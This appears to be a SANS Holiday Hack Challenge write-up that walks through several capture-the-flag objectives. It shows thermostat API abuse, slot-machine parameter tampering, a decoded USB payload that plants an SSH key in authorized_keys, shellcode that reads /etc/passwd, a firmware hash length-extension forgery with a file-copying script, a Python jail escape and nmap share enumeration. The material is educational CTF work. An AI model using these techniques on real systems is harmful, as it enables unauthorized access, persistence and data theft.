  • 7. SANS HHC: Challenge and Terminal Assessment Report After correctly traveling to all locations via sleigh upon correct analysis of the evidence you must select the correct elf based on their characteristics. In this game it was Noel Boetie. Upon selecting the correct elf, you receive the Where in the World is Caramel Santiago? achievement. 2.3 Objective 3 – Thaw Frost Tower’s Entrance The third objective is found in front of Frost Tower. The goal of this objective is to gain access to a thermostat via WIFI and use the command line to adjust the temperature and thaw the front door. Greasy GopherGuts in front of Frost Tower gives you three hints without having to solve a terminal challenge. The following information and hints regarding this objective are given: • Linux Wi-Fi Commands – The iwlist and iwconfig utilities are key for managing Wi-Fi from the Linux command line • Web Browsing with cURL - cURL makes HTTP requests from a terminal – in Mac, Linux, and modern Windows! • Adding Data to cURL requests – When sending a POST request with data, add –data-binary to your curl command followed by the data you want to send. The thermostat can be seen through the window next to the door. Getting as close as possible to the thermostat, opening the Wi-Fi adapter interface, and running the following command shows us an open wireless network. We can connect to the wireless network using the following command. We also see that, upon connecting, we are given the URL to the setup for the thermostat. elf@d21a3aa6f958:~$ iwlist scanning Wlan 0 scan complated: Cell 01 – Address: 02:4a:46:68:69:21 Frequency: 6.2 GHz (Channel 40) Quality=48/70 Signal level=-62 dBm Encryption key:off Bit Rates: 400 Mb/s ESSID:”FROST-Nidus-Setup”
Running curl against http://nidus-setup:8080 gives us the setup banner, and curl against http://nidus-setup:8080/apidoc gives us man-page style instructions for the thermostat API. Note the "Available with registering?" column in the endpoint table: the cooler endpoint is usable before the device is registered, so nothing stands between an unauthenticated client and the temperature setting.

    elf@d21a3aa6f958:~$ iwconfig wlan0 essid "FROST-Nidus-Setup"
    ** New network connection to Nidus Thermostat detected! Visit http://nidus-setup:8080/ to complete setup.
    (The setup is comptaible with the 'curl' utility)

    elf@d21a3aa6f958:~$ curl http://nidus-setup:8080
    ----------------------------------------------------------------------------
    Nidus Thermostat Setup
    ----------------------------------------------------------------------------

    WARNING Your Nidus Thermostat is not currently configured! Access to this
    Device is restricted until you register your thermostat >> /register. Once
    you have completed registration, the device will be fully activated.

    In the meantime, Due to North Pole Health and Safety regulations
    42 N.P.H.S 2600(h)(0) - frostbite proection, you may adjust the temperate.

    API
    The API for your Nidus Thermostat is located at http://nidus-setup:8080/apidoc

    elf@d21a3aa6f958:~$ curl http://nidus-setup:8080/apidoc
    ----------------------------------------------------------------------------
    Nidus Thermostat API
    ----------------------------------------------------------------------------

    The API endpoints are accessed via:

    http://nidus-setup:8080/api/<endpoint>

    Utilize a GET request to query information; for example, you can check the
    temperatures set on your cooler with:

    curl -XGET http://nidus-setup:8080/api/cooler

    Utilize a POST request with a JSON payload to configuration information; for
    example, you can change the temperature on your cooler using:

    curl -XPOST -H 'Content-Type: application/json' --data-binary '{"temperature": -40}' http://nidus-setup:8080/api/cooler

    - Warning: DO NOT SET THE TEPERATURE ABOVE 0! That might melt important furniture

    Available endpoints
    ------------------------------------------------------------
    | Path                         | Available with registering?|
    ------------------------------------------------------------
    | /api/cooler                  | Yes                        |
    ------------------------------------------------------------
    | /api/host-ice-tank           | No                         |
    ------------------------------------------------------------
    ...

Now we can set the temperature above zero to melt the door:

    elf@d21a3aa6f958:~$ curl -XPOST -H 'Content-Type: application/json' --data-binary '{"temperature": 100}' http://nidus-setup:8080/api/cooler
    {
      "temperature": 100.45,
      "humidity": 68.89,
      "wind": 5.3,
      "windchill": 112.72,
      "WARNING": "ICE METL DETECT!"
    }
    elf@d21a3aa6f958:~$

After running this command the doors are thawed and we can access Frost Tower. We also get the achievement Thaw Frost Tower's Entrance.

2.4 Objective 4 – Slot Machine Investigation

In this objective we must play a slot machine game, but manipulate it so that we finish with more than 1,000 coins. Noel Boetie, in front of Santa's Castle, gives us two hints after we solve the Logic Munchers terminal challenge:

• Parameter Tampering – It seems they're susceptible to parameter tampering.
• Intercepting Proxies – Web application testers can use tools like Burp Suite or even right in the browser with Firefox's Edit and Resend feature.

Inspecting the web traffic between slots.jackfrosttower.com and the browser, we find the following POST data is sent with each spin:

    betamount=[num]&numline=[num]&cpl=[num]

Tampering with these parameters shows that the server accepts a negative numline, and its arithmetic then credits us a positive amount even when the spin loses. Using Burp Repeater we send requests with a negative numline in quick succession, gaining coins on every spin, until the credit passes 1,000 and the JSON response contains the following:

    {
      "success": true,
      "data": {
        "credit": 1038,
        ...
        "response": "I'm going to have some bouncer trolls bounce you right out of this casino!"
      },
      "message": "Spin success"
    }
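The report never shows the casino's server code, so the following is an added illustration rather than the game's implementation: a Python model of how an unvalidated, client-supplied numline turns a debit into a credit, beside the validation that would have stopped the Burp Repeater loop. The field names match the POST body above; the settlement formula and the limits are assumptions made for the example.

```python
"""Model of the slot-machine parameter-tampering flaw (added illustration).

Not the casino's real server code, which the report never shows. Assumed
settlement rule: debit = betamount * numline * cpl, credit -= debit, then
any payout is added. With that rule a negative numline turns the debit into
a credit, which is the behaviour seen in Burp Repeater. Limits are assumed.
"""

MAX_BET = 100        # assumed server-side limits
MAX_NUMLINE = 20
MAX_CPL = 10


class InvalidSpin(ValueError):
    """Client-supplied spin parameters failed validation."""


def parse_form(body: str) -> dict:
    """Parse 'betamount=1&numline=-20&cpl=1' into {name: raw string}."""
    fields = {}
    for pair in body.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            fields[name] = value
    return fields


def settle_vulnerable(credit: int, fields: dict, payout: int) -> int:
    """Trusts the client. int() happily parses '-20', so the debit goes
    negative and the player gains coins even on a losing spin (payout 0)."""
    bet = int(fields["betamount"])
    numline = int(fields["numline"])
    cpl = int(fields["cpl"])
    return credit - bet * numline * cpl + payout


def _bounded_int(fields: dict, name: str, upper: int) -> int:
    """Accept only a plain ASCII decimal integer in 1..upper."""
    raw = fields.get(name, "")
    if not (raw.isascii() and raw.isdigit()):   # rejects '', '-20', '+5', '1e3', ' 5'
        raise InvalidSpin(f"{name}: not a positive integer: {raw!r}")
    value = int(raw)
    if not 1 <= value <= upper:
        raise InvalidSpin(f"{name}: {value} outside 1..{upper}")
    return value


def settle_hardened(credit: int, fields: dict, payout: int) -> int:
    """Range-checks every field and refuses a wager the player cannot cover,
    so the only way the balance can rise is through payout."""
    bet = _bounded_int(fields, "betamount", MAX_BET)
    numline = _bounded_int(fields, "numline", MAX_NUMLINE)
    cpl = _bounded_int(fields, "cpl", MAX_CPL)
    debit = bet * numline * cpl
    if debit > credit:
        raise InvalidSpin("insufficient credit for this wager")
    return credit - debit + payout


if __name__ == "__main__":
    tampered = parse_form("betamount=1&numline=-20&cpl=1")
    print(settle_vulnerable(100, tampered, payout=0))   # 120: lost the spin, 20 coins richer
    try:
        settle_hardened(100, tampered, payout=0)
    except InvalidSpin as exc:
        print("rejected:", exc)
```

The hardened version treats every field as hostile text until it has passed an allow-list check (digits only, bounded range, affordable wager); that is the general fix for parameter tampering, and it is why the check has to live on the server rather than in the page's JavaScript.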
Entering the text from the response attribute, "I'm going to have some bouncer trolls bounce you right out of this casino!", into the challenge textbox on the badge solves the objective and gives us the Slot Machine Scrutiny achievement.

2.5 Objective 5 – Strange USB Device

The goal of this objective is to reverse engineer a Ducky Script found on a USB device and work out what keystrokes it sends to the computer it is plugged into. The following hints are given for this objective:

• Ducky Script – Ducky Script is the language for the USB Rubber Ducky.
• Duck Encoder – Attackers can encode Ducky Script using a duck encoder for delivery as inject.bin.
• MITRE ATT&CK and Ducky – The MITRE ATT&CK technique T1098.004 describes SSH persistence through authorized_keys files.
• Ducky RE with Mallard – It's also possible to reverse engineer encoded Ducky Script using Mallard.

The terminal greets us with:

    A random USB device, oh what could be the matter?
    It seems a troll has left this, right on a silver platter.
    Oh my friend I need your ken, this does not smell of attar.
    Help solve this challenge quick quick, I shall offer no more natter.

    Evaluate the USB data in the /mnt/USBDEVICE.

On the device we find an encoded Ducky Script payload named inject.bin. As the hint suggests, we decode it with the provided mallard.py. The interesting STRING line types an obf\u200bscated command: a blob that is reversed, base64-decoded and piped straight into bash.

    elf@36ac099f3f10:~$ ls /mnt/USBDEVICE
    inject.bin
    elf@36ac099f3f10:~$ ./mallard.py -f /mnt/USBDEVICE/inject.bin
    ...
    ENTER
    DELAY 200
    STRING echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92... | rev | base64 -d | bash
    ENTER
    DELAY 600
    ...

To see what the payload does without running it on our own machine, we reproduce the decoding step but drop the trailing | bash, so the decoded shell command is printed instead of executed:

    elf@36ac099f3f10:~$ echo ==gCzlXZr9FZlpXay9Ga0VXYvg2cz5yL+BiP+AyJt92YuIXZ39Gd0N3byZ2ajFmau4WdmxGbvJHdAB3bvd2Ytl3ajlGILFESV1mWVN2SChVYTp1VhNlRyQ1UkdFZopkbS1EbHpFSwdlVRJlRVNFdwM2SGVEZnRTaihmVXJ2ZRhVWvJFSJBTOtJ2ZV12YuVlMkd2dTVGb0dUSJ5UMVdGNXl1ZrhkYzZ0ValnQDRmd1cUS6x2RJpHbHFWVClHZOpVVTpnWwQFdSdEVIJlRS9GZyoVcKJTVzwWMkBDcWFGdW1GZvJFSTJHZIdlWKhkU14UbVBSYzJXLoN3cnAyboNWZ | rev | base64 -d
    echo 'ssh-rsa UmN5RHJZWHdrSHRodmVtaVp0d1l3U2JqZ2doRFRHTGRtT0ZzSUZNdyBUaGlzIGlzIG5vdCByZWFsbHkgYW4gU1NIIGtleSwgd2UncmUgbm90IHRoYXQgbWVhbi4gdEFKc0tSUFRQVWpHZGlMRnJhdWdST2FSaWZSaXBKcUZmUHAK ickymcgoop@trollfun.jackfrosttower.com' >> ~/.ssh/authorized_keys
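As an added example (not part of the original report or of mallard.py), the following Python reproduces that decoding step offline: it finds the STRING line that echoes a blob into rev | base64 -d | bash, inverts the obfuscation without executing anything, and pulls the user out of the authorized_keys line. The Ducky Script and the key comment in it are constructed here; the real blob from inject.bin is handled by the same functions.

```python
"""Decode the obfuscated command planted by the Ducky Script (added example).

Not part of the original report or of mallard.py. The payload types
    echo <blob> | rev | base64 -d | bash
so the inverse is: reverse the blob, base64-decode it, read the shell
command. Nothing here executes what it decodes. The Ducky Script and the key
comment below are constructed; the real blob from inject.bin is handled by
the same functions.
"""
import base64
import re
import shlex

_PLANTED_CMD = (
    "echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7 evil_troll@example.invalid' "
    ">> ~/.ssh/authorized_keys"
)
# Obfuscate the way the attacker did: base64 first, then reverse the text.
_BLOB = base64.b64encode(_PLANTED_CMD.encode())[::-1].decode()

SAMPLE_DUCKY_SCRIPT = f"""DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 200
STRING echo {_BLOB} | rev | base64 -d | bash
ENTER
DELAY 600
"""

_REV_B64 = re.compile(r"echo\s+(\S+)\s*\|\s*rev\s*\|\s*base64\s+(?:-d|--decode)")


def decode_rev_b64(blob: str) -> str:
    """Invert 'echo blob | rev | base64 -d' (the newline echo adds is
    whitespace, which base64 -d ignores, so reverse + decode is exact)."""
    return base64.b64decode(blob[::-1]).decode()


def extract_planted_commands(ducky_script: str) -> list:
    """Decode every STRING line that echoes a blob through rev and base64 -d."""
    decoded = []
    for line in ducky_script.splitlines():
        if line.startswith("STRING "):
            m = _REV_B64.search(line[len("STRING "):])
            if m:
                decoded.append(decode_rev_b64(m.group(1)))
    return decoded


def authorized_key_users(command: str) -> list:
    """For a command that appends to authorized_keys, return the user part of
    each key comment (the trailing user@host field of an OpenSSH public key)."""
    if "authorized_keys" not in command:
        return []
    users = []
    for tok in shlex.split(command):
        if tok.startswith(("ssh-rsa ", "ssh-ed25519 ", "ecdsa-sha2-")):
            users.append(tok.split()[-1].split("@")[0])
    return users


if __name__ == "__main__":
    for cmd in extract_planted_commands(SAMPLE_DUCKY_SCRIPT):
        print(cmd)
        print("planted for:", authorized_key_users(cmd))
```

The point of decoding in a script rather than in a shell is that the pipeline never reaches bash: pasting the attacker's own command line with the final | bash left in would install the key on the analyst's machine.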
The decoded command appends an SSH public key to ~/.ssh/authorized_keys, giving the troll persistent SSH access to the machine (MITRE ATT&CK T1098.004). The key comment tells us the username: ickymcgoop. Entering it into the badge solves the objective and gives us the Strange USB Device achievement.

    What is the troll username involved with this attack?
    > ickymcgoop
    Your answer: Checking...
    Your answer is correct! Drat that Icky Mcgoop!

2.6 Objective 6 - Shellcode Primer

This sixth objective is a web-based application that walks you through writing x64 assembly, which is the foundation for creating and understanding shellcode (machine code, usually handled as hex, that exploit programs and scripts inject and execute). Hints are given by Chimney Scissorsticks upon completing Santa's Holiday Hero terminal challenge:

• Shellcode Primer Primer – If you run into any shellcode primers at the North Pole, be sure to read the directions and the comments in the shellcode source!
• Debugging Shellcode – Also, troubleshooting shellcode can be difficult. Use the debugger step-by-step feature to watch values.
• Register Stomping – Lastly, be careful not to overwrite any register values you need to reference later on in your shellcode.

To solve this challenge you must complete each level by entering the assembly that performs the task. The levels, with the primer's own instructions and the code that solves each one, are covered below.

1. Introduction – Welcome to Shellcode Primer! The goal of Shellcode Primer is to teach you how to write some basic x64 shellcode for reading a file. We'll take you through each piece of what you need, step by step, and show you what's going on. First, let's learn the user interface a bit. There's some code below. The left is where you type code, and the right will attempt to syntax-highlight and show build errors. For the time being, you don't need to change anything, just have a look at what it's doing - it's more or less the same type of stuff you're going to be learning. Go ahead and execute the code (using the button below) and play around in the debugger. On the left, you'll see instructions executing in the order that they execute. Click on them to see the state when that instruction executes! Also, don't forget to click that hint button below! Hints don't cost you anything. :)

No instructions necessary as the default code already solves this step.

2. Loops – Although you won't have to worry about writing a loop for any of these lessons, showing how a loop works is a good demo for the debugger. Look at the code below, then execute it (no need to change it). Watch how the same code repeats, over and over, with rax changing in each loop. Notice how the code listing below isn't the same as what is executed in the debugger. In the History section of the debugger, the instructions will change to show what is executed to achieve what you describe in the assembly source code.

No instructions necessary as the default code already solves this step.

3. Getting started – Welcome! Are you ready to learn how to write shellcode? We hope so! First, some tips:

• Comments are denoted with a semicolon (;)
• Don't forget to look at the debugger, line by line, if something is wrong
• Really, don't forget to read the error list! We check each place where you might go wrong in your code
• Your code for each level is saved in your browser, so you can leave and come back, refresh the page, and hop back to previous levels to borrow code

This level currently fails to build because it has no code. Can you add a return statement at the end? Don't worry about what it's actually returning (yet!)

    ; This is a comment! We'll use comments to help guide your journey.
    ; Right now, we just need to RETurn!
    ;
    ; Enter a return statement below and hit Execute to see what happens!
    ret

4. Returning a Value – Now that we have an empty function, we can start building some code! Let's learn what a register is. A register is like a variable, except there are a small number of them – you have about eight general purpose 64-bit integer registers on amd64 (we won't talk about floating point or other special registers):

• rax
• rbx
• ...

All mathy stuff that a computer does (add, subtract, xor, etc) operates on registers, not directly on memory. So they're super important! Specific registers have some implicit meaning, mostly by convention. For example, when a function returns, its return value is typically put in rax. For this level, can you return the number '1337' from your function?

    ; TODO: Set rax to 1337
    mov rax, 1337
    ; Return, just like we did last time
    ret

5. System Calls – If you've made it this far, I bet you're wondering how to make your shellcode do something! If you're familiar with Python, you might know how to use the open() function. If you know C, you might know the fopen() function. But what these and similar functions have in common is one thing: they're library code. And because shellcode needs to be self contained, we don't have (easy) access to library code! So how do we deal with that? Linux has something called a syscall, or system call. A syscall is a request that a program makes that asks Linux – the kernel – to do something. And it turns out, at the end of the day, all of the library calls ultimately end with a syscall. Here is a list of available syscalls on x64 (alternative). To perform a syscall:

• The number for the desired syscall is moved into rax
• The first parameter is moved into rdi, the second into rsi, and the third into rdx (there are others, but not many syscalls need more than 3 parameters)
• Execute the syscall instruction

The second the syscall executes, Linux flips into kernel mode and we can no longer debug it. When it's finished, it returns the result in rax. For this challenge we're going to call sys_exit to exit the process with exit code 99. Can you prepare rax and rdi with the correct values to exit? As always, feel free to mess around as much as you like!

    ; TODO: Find the syscall number for sys_exit and put it in rax
    mov rax, 60
    ; TODO: Put the exit_code we want (99) in rdi
    mov rdi, 99
    ; Perform the actual syscall
    syscall

6. Calling Into the Void – Before we learn how to use Really Good syscalls, let's try something fun: crash our shellcode on purpose! You might think I'm mad, but there's a method to my madness. Run the code below and watch what happens! No need to modify it, unless you want to. :) Be sure to look at the debugger to see what's going on! Especially notice the top of the stack at the ret instruction.

No instructions necessary as the default code already solves this step.

7. Getting RIP – What happened in the last exercise? Why did it crash at 0x12345678? And did you notice the 0x12345678 was on top of the stack when ret happened? The short story is this: call pushes the return address onto the stack, and ret jumps to it. Whaaat?? This is going to be long, but hopefully it will make it all clear! Let's back up a bit. At any given point, the address of the instruction currently being executed is stored in a special register called the instruction pointer (rip), which you may also hear called a program counter (pc). What is the rip value at the first line in our code? Well, since we have a debugger, we know that it's 0x1337000. But sometimes you don't know and need to find out. The most obvious answer is to treat it like a normal register, like this:

    mov rax, rip
    ret

Does that work? Nope! You can't directly access rip. That means we need a trick! When you use call in x64, the CPU doesn't care where it's calling, or whether there's a ret waiting for it. The CPU assumes that, if the author put a call in, there will naturally be a ret on the other end. Doing anything else would be just silly! So call pushes the return address onto the stack before jumping into a function. When the function completes, the ret instruction uses the return address on the stack to know where to return to. The CPU assumes that, sometime later, a ret will execute. The ret assumes that at some point earlier a call happened, and that means that the top of the stack has the return address. The ret will retrieve the return address off the top of the stack (using pop) and jump to it. Of course, we can execute pop too! If we pop the return address off the stack, instead of jumping to it, the address goes into a register. Hmm. Does that also sound like mov REG,rip to you? For this exercise, can you pop the address after the call – the No Op (nop) instruction – into rax, then return?

    ; Remember, this call pushes the return address to the stack
    call place_below_the_nop
    ; This is where the function *thinks* it is supposed to return
    nop
    ; This is a 'label' - as far as the call knows, this is the start of a function
    place_below_the_nop:
    ; TODO: Pop the top of the stack into rax
    pop rax
    ; Return from our code, as in previous levels
    ret

8. Hello, World! – So remember how last level, we got the address of nop and returned it? Did you see that nop execute? Nope! We jumped right over it, but stored its address en route. What can we do by knowing our own address? Well, since shellcode is, by definition, self-contained, you can do other fun stuff like include data alongside the code! What if the return address isn't an instruction at all, but a string? For this next exercise, we include a plaintext string – 'Hello World!' – as part of the code. It's just sitting there in memory. If you look at the compiled code, it's all basically Hello World, which doesn't run. Instead of trying to run it, can you call past it, and pop its address into rax? Don't forget to check the debugger after to see it in rax!

    ; This would be a good place for a call
    call lblhello
    ; This is the literal string 'Hello World', null terminated, as code. Except
    ; it'll crash if it actually tries to run, so we'd better jump over it!
    db 'Hello World',0
    ; This would be a good place for a label and a pop
    lblhello:
    pop rax
    ; This would be a good place for a re... oh wait, it's already here. Hooray!
    ret

9. Hello World!! – Remember syscalls? Earlier, we used them to call an exit. Now let's try another! This time, instead of getting a pointer to the string Hello World, we're going to print it to standard output (stdout). Have another look at the syscall table. Can you find sys_write, and use it to print the string Hello World! to stdout? Note: stdout's file descriptor is 1.

    ; TODO: Get a reference to this string into the correct register
    call below_string
    db 'Hello World!',0
    below_string:
    ; Set up a call to sys_write
    ; TODO: Set rax to the correct syscall number for sys_write
    mov rax, 1
    ; TODO: Set rdi to the first argument (the file descriptor, 1)
    mov rdi, 1
    ; TODO: Set rsi to the second argument (buf - this is the "Hello World" string)
    ; The call above left the string's address on top of the stack, so pop it
    pop rsi
    ; TODO: Set rdx to the third argument (length of the string, in bytes)
    mov rdx, 12
    ; Perform the syscall
    syscall
    ; Return cleanly (the pop already removed the call's return address, so the stack is balanced)
    mov rax, 0
    ret

10. Opening a File – We're getting dangerously close to doing something interesting! How about that? Can you use the sys_open syscall to open /etc/passwd, then return the file handle (in rax)? Have another look at the syscall table. Can you call sys_open on the file /etc/passwd, then return the file handle? Here's the syscall table again.

    ; TODO: Get a reference to this string into the correct register
    call after_string
    db '/etc/passwd',0
    after_string:
    ; Set up a call to sys_open
    ; TODO: Set rax to the correct syscall number
    mov rax, 2
    ; TODO: Set rdi to the first argument (the filename)
    pop rdi
    ; TODO: Set rsi to the second argument (flags - 0 is fine)
    mov rsi, 0
    ; TODO: Set rdx to the third argument (mode - 0 is also fine)
    mov rdx, 0
    ; Perform the syscall
    syscall
    ; syscall sets rax to the file handle, so to return the file handle we don't
    ; need to do anything else!
    ret

11. Reading a File – Do you feel ready to write some useful code? We hope so! You're mostly on your own this time! Don't forget that you can reference your solutions from other levels! For this exercise, we're going to read a specific file...let's say, /var/northpolesecrets.txt...and write it to stdout. No reason for the name, but since this is Jack Frost's troll-trainer, it might be related to a top-secret mission! Solving this is going to require three syscalls! Four if you decide to use sys_exit – you're welcome to return or exit, just don't forget to fix the stack if you return! First up, just like last exercise, call sys_open. This time, be sure to open /var/northpolesecrets.txt. Second, find the sys_read entry on the syscall table, and set up the call. Some tips:

1. The file descriptor is returned by sys_open
2. The buffer for reading the file can be any writeable memory – rsp is a great option, temporary storage is what the stack is meant for
3. You can experiment to find the right count, but if it's a bit too high, that's perfectly fine

Third, call sys_write to send the buffer to stdout:

1. The file descriptor for stdout is always 1
2. The best value for count is the return value from sys_read, but you can experiment with that as well (if it's too long, you might get some garbage after; that's okay!)

Finally, if you use rsp as a buffer, you won't be able to ret, you're going to overwrite the return address and ret will crash. That's okay! You remember how to sys_exit, right? :) (For an extra challenge, you can also subtract from rsp, use it, then add to rsp to protect the return address. That's how applications typically do it.) Good luck!

The solution below takes the extra-challenge route: it reserves 200 bytes below rsp for the read buffer and releases them before ret, so the return address the primer pushed is never clobbered. The write uses a fixed count of 200 rather than the byte count sys_read returned in rax; the primer says trailing garbage is acceptable here, but a cleaner version would copy rax into rdx before rax is reused for the sys_write number.

    ; TODO: Get a reference to this string into the correct register
    call after_string
    db '/var/northpolesecrets.txt',0
    after_string:
    ; Call sys_open(filename, O_RDONLY, 0); the filename address is on the stack from the call
    mov rax, 2
    pop rdi
    mov rsi, 0
    mov rdx, 0
    syscall
    ; Call sys_read(fd, buf, 200): fd came back in rax, buf is 200 bytes carved out below rsp
    mov rdi, rax
    mov rax, 0
    sub rsp, 200
    mov rsi, rsp
    mov rdx, 200
    syscall
    ; Call sys_write(1, buf, 200) to copy the buffer to stdout. The stack is
    ; released first; rsi still points at the data and nothing touches the stack
    ; before the syscall, so this is safe
    mov rax, 1
    mov rdi, 1
    mov rsi, rsp
    add rsp, 200
    mov rdx, 200
    syscall
    ; rsp is back where the primer left it, so a plain ret is safe; return 0
    mov rax, 0
    ret

Completing the final level prints the contents of /var/northpolesecrets.txt, which contains the answer for the badge (the report shows that output as a screenshot, not reproduced here). Entering the answer, cyber security knowledge, into the badge completes the objective and earns the Shellcode Primer! achievement.

2.7 Objective 7 – Printer Exploitation

In this objective we attack the firmware-update feature of the printer at printer.kringlecastle.com. Its update files are "signed" with a plain SHA-256 over a secret followed by the firmware, so we can forge a valid signature for a modified firmware with a hash length-extension attack and use the resulting code execution to read the print spool.
The following hints are given for this challenge by Ruby Cyster after completing the previous objective:

• Printer Firmware – When analyzing a device, it's always a good idea to pick apart the firmware. Sometimes these things come down to Base64-encoding.
• Hash Extension Attacks – Hash Extension Attacks can be super handy when there's some type of validation to be circumvented.
• Dropping Files – Files placed in /app/lib/public/incoming will be accessible under https://printer.kringlecastle.com/incoming.
• Untitled Hint – Do you know that if you append multiple files of that type, the last one is processed?

So we will probably need to perform a hash extension attack on the firmware and append a file that gives us a remote shell or copies the file of interest into a directory we can reach over the web. On the printer's web interface we can download the existing firmware as a JSON file:

    {
      "firmware": "UesDBBQAAAAIAEWlkFMWoKjwagkAAOBAAAAMABwAZmlybXdh...",
      "signature": "2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97",
      "secret_length": 16,
      "algorithm": "SHA256"
    }

This is worth recording, because it is everything a length-extension attack needs. The firmware field is Base64-encoded data (a zip archive, as we see shortly), and the validation scheme is spelled out:

• Signature hash: 2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97
• Secret length: 16
• Algorithm: SHA256

A signature computed as SHA256(secret || data) is exactly the construction length extension breaks: anyone who knows the digest, the data and the length of the secret can append bytes and compute the digest of secret || data || padding || appended-bytes without ever learning the secret. Decoding the Base64 yields a zip archive containing firmware.bin. We build a replacement firmware.bin that is a shell script, zip it, and then run the length-extension attack with the hash_extender tool from GitHub: clone it with git clone https://github.com/iagox86/hash_extender, change into the directory and run make (on Linux, of course).

We rename the original firmware.bin to xploit.bin, write our script as the new firmware.bin, and zip both together. The script copies /var/spool/printer.log into /app/lib/public/incoming/xploit.log, where the Dropping Files hint says we can fetch it over HTTPS:

    [linuxace@objective7]$ cat firmware-export.json | jq '.firmware' | tr -d '"' | base64 -d > firmware.zip
    [linuxace@objective7]$ file firmware.zip
    firmware.zip: Zip archive data, at least v2.0 to extract
    [linuxace@objective7]$ unzip firmware.zip
    Archive:  firmware.zip
      inflating: firmware.bin
    [linuxace@objective7]$ mv firmware.bin xploit.bin
    [linuxace@objective7]$ printf '#!/bin/sh\ncp /var/spool/printer.log /app/lib/public/incoming/xploit.log\n' > firmware.bin
    [linuxace@objective7]$ zip xploit.zip firmware.bin xploit.bin

With the payload archive built, the remaining step is the extension itself: hash_extender takes the original firmware.zip, the bytes to append (our xploit.zip, passed as hex), the known signature and the secret length, and outputs both the new data (original zip, glue padding, appended zip) and a signature the printer will accept for it.
Running hash_extender:

    [linuxace@objective7]$ ./hash_extender --file=firmware.zip --append=`xxd -p xploit.zip | tr -d '\n'` --append-format=hex --signature=2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97 --format=sha256 --out-data-format=hex
    Type: sha256
    Secret length: 16
    New signature: e88de8d46972f4208717086e99d27c9aaed64f39f3726ba2ca5f149a0c152b61
    New string: 504b030414000000080045a5905316a0a8f06a090000e04000000c001c006669726d776...

We take the hex output (New string) and Base64-encode it, for example in CyberChef, then put that Base64 and the New signature into firmware-export.json in place of the original values and upload it. The signature has to be exactly the one hash_extender printed for the bytes we appended; any change to the payload means re-running the tool. Because the signature verifies, the printer accepts the upload, and because the last firmware.bin in the appended data is our script, it is the one that runs and copies the spool file into the web-accessible directory.

    {
      "firmware": "UesDBBQAAAAIAEWlkFMWoKjwagkAAOBAAAAMABwAZmlybXdh...",
      "signature": "dce5658ae7a012cada67080dd9098e6f246a3f4821179fc63169bd49b226ee38",
      "secret_length": 16,
      "algorithm": "SHA256"
    }

After uploading the file with the correct signature (the report shows the printer's response as a screenshot), we obtain the copied spool file with curl:

    [linuxace@objective7]$ curl https://printer.kringlecastle.com/incoming/xploit.log
    Documents queued for printing
    =============================
    Biggering.pdf
    Size Chart from https://clothing.north.pole/shop/items/TheBigMansCoat.pdf
    LowEarthOrbitFreqUsage.txt
    Best Winter Songs Ever List.doc
    Win People and Influence Friends.pdf
    Q4 Game Floor Earnings.xlsx
    Fwd: Fwd: [EXTERNAL] Re: Fwd: [EXTERNAL] LOLLLL!!!.eml
    Troll_Pay_Chart.xlsx

The last .xlsx file printed is Troll_Pay_Chart.xlsx. Entering this into the objective on our badge solves it and earns the Hash extension of ELF or firmware achievement.

2.8 Objective 8 – Kerberoasting on an Open Fire

This is one of two challenges in this year's event rated five trees. We must chain a number of techniques, including Kerberoasting, to obtain a document that names a secret ingredient Santa urges each elf and reindeer to consider. We have to find this ingredient and enter it on the badge. Hints for this objective come from Eve Snowshoes after solving the HoHo...No terminal.
The following hints are given by Eve Snowshoes for this objective:

• Kerberoast and AD Abuse Talk – Check out Chris Davis' talk and scripts on Kerberoasting and Active Directory permissions abuse.
• Kerberoasting and Hashcat Syntax – Learn about Kerberoasting to leverage domain credentials to get usernames and crackable hashes for service accounts.
• Finding Domain Controllers – There will be some 10.X.X.X networks in your routing tables that may be interesting. Also, consider adding -PS22,445 to your nmap scans to "fix" default probing for unprivileged scans.
• Hashcat Mangling Rules – OneRuleToRuleThemAll.rule is great for mangling when a password dictionary isn't enough.
• CeWL for Wordlist Creation – CeWL can generate some great wordlists from websites, but it will ignore digits in terms by default.
• Stored Credentials – Administrators often store credentials in scripts. These can be co-opted by an attacker for other purposes!
• Active Directory Interrogation – Investigating Active Directory permissions is harder without Bloodhound, but there are native methods.

The first thing we must do is sign up for an Elf University account at https://register.elfu.org/register. This creates an unprivileged domain user that we can use to log in over SSH. A real email address must be used, because the credentials are sent to it.
Logging in, we find ourselves in an application jail: a Python menu program, /opt/grading_system. After some trial and error we break out of it by sending end-of-file with CTRL+D, which raises an EOFError from input() that the program never catches; because the interpreter drops to an interactive prompt after the traceback, we can import os and run bash from there.

    ===================================================
    =      Elf University Student Grades Portal       =
    =          (Reverts Everyday 12am EST)            =
    ===================================================
    1. Print Current Courses/Grades.
    e. Exit
    :
    Traceback (most recent call last):
      File "/opt/grading_system", line 41, in <module>
        main()
      File "/opt/grading_system", line 26, in main
        a = input(": ").lower().strip()
    EOFError
    >>> import os
    >>> os.system("/bin/bash")
    foszlyqkmw@grades:~$

Let's begin exploring with the tools on the system, including nmap. Running route shows the following networks:

    foszlyqkmw@grades:~$ route
    Kernel IP routing table
    Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
    default         172.17.0.1      0.0.0.0         UG    0      0        0 eth0
    10.128.1.0      172.17.0.1      255.255.255.0   UG    0      0        0 eth0
    10.128.2.0      172.17.0.1      255.255.255.0   UG    0      0        0 eth0
    10.128.3.0      172.17.0.1      255.255.255.0   UG    0      0        0 eth0
    172.17.0.0      0.0.0.0         255.255.0.0     U     0      0        0 eth0

We scan these networks for SMB (port 445, enumerating shares) and LDAP (port 389) to locate the domain controllers and any file shares, since we need both for the next steps:

    # Nmap 7.80 scan initiated Wed Jan 5 14:19:30 2022 as: nmap -Pn --open --script=smb-enum-shares -p 445 -T5 -oN report.txt 172.17.0.0/16
    172.17.0.3
      Shares: IPC$ ElfUFiles
    172.17.0.4
      Shares: IPC$ elfu_svc_shr netlogon sysvol research_dep
    10.128.3.30
      Shares: IPC$ elfu_svc_shr netlogon sysvol research_dep

